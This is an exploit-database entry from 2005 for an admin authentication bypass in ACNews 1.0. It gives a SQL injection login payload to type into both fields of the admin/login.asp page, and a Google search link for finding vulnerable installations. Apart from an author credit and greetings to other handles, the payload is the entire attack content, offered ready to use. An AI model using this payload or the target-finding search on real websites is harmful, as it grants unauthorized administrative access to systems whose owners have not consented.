ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit

2005-04-09T00:00:00
ID 1337DAY-ID-94
Type zdt
Reporter LaMeR
Modified 2005-04-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit
===============================================================




# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team



#  0day.today [2018-03-03]  #